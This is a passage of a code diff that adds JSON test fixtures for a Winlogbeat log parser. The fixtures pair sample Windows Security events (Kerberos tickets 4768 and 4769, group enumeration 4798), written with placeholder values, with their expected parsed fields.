:\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service 
:\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + 
} + } + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service 
:\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", + "event": { + "action": "Service d\u2019authentification Kerberos", + "code": "4768", + "kind": "event", + "module": 
"security", + "original": "Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount\n\tNom du domaine Kerberos fourni :\tDOMAIN\n\tID de l\u2019utilisateur :\t\t\tS-1-2-3\n\nInformations sur le service :\n\tNom du service :\t\tservice\n\tID du service :\t\tS-1-2-3-4-5\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t51261\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810010\n\tCode de r\u00e9sultat :\t\t0x0\n\tType de chiffrement du ticket :\t0x12\n\tType de pr\u00e9-authentification :\t2\n\nInformations sur le certificat :\n\tNom de l\u2019\u00e9metteur du certificat :\t\t\n\tNum\u00e9ro de s\u00e9rie du certificat :\t\n\t Empreinte num\u00e9rique du certificat :\t\t\n\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\n\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:10.124000Z", + "action": { + "id": 4768, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "51261", + "PreAuthType": "2", + "ServiceName": "service", + "ServiceSid": "S-1-2-3-4-5", + "Status": "0x0", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "account", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810010" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOSTNAME.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + 
"account" + ] + }, + "service": { + "name": "service" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 51261 + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account", + "target": { + "domain": "DOMAIN", + "name": "account" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOSTNAME.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4768", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 3228 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2476587536", + "task": "Service d\u2019authentification Kerberos" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4769.json b/Beats/winlogbeat/tests/security_event_4769.json new file mode 100644 index 000000000..ac4cdd94d --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4769.json 
@@ -0,0 +1,101 @@ +{ + "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service 
:\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le 
r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", + "event": { + "action": "Op\u00e9rations de ticket du service Kerberos", + "code": "4769", + "kind": "event", + "module": "security", + "original": "Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount@DOMAIN.PRIV\n\tDomaine du compte :\t\tDOMAIN.PRIV\n\tGUID d\u2019ouverture de session :\t\t{12345678-ABCD-EF90-1234-123456ABCDEF}\n\nInformations sur le service :\n\tNom du service :\t\tSERVICE$\n\tID du service :\t\tS-1-2-3\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t50754\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810000\n\tType de chiffrement du ticket :\t0x12\n\tCode d\u2019\u00e9chec :\t\t0x0\n\tServices en transit :\t-\n\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\n\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\n\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:02.856000Z", + "action": { + "id": 4769, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "50754", + "LogonGuid": "{12345678-ABCD-EF90-1234-123456ABCDEF}", + "ServiceName": "SERVICE$", + "ServiceSid": "S-1-2-3", + "Status": "0x0", + "TargetDomainName": "DOMAIN.PRIV", + "TargetUserName": "account@DOMAIN.PRIV", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810000", + "TransmittedServices": "-" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOST01.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "SERVICE$" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 50754 + }, + "user": { + "domain": "DOMAIN.PRIV", + "name": "account", + "target": { + "domain": "DOMAIN.PRIV", + "name": "account@DOMAIN.PRIV" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4769", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 7992 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": 
"Microsoft-Windows-Security-Auditing", + "record_id": "2476587153", + "task": "Op\u00e9rations de ticket du service Kerberos" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4798.json b/Beats/winlogbeat/tests/security_event_4798.json new file mode 100644 index 000000000..3e7783fbd --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4798.json 
@@ -0,0 +1,114 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program 
Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was 
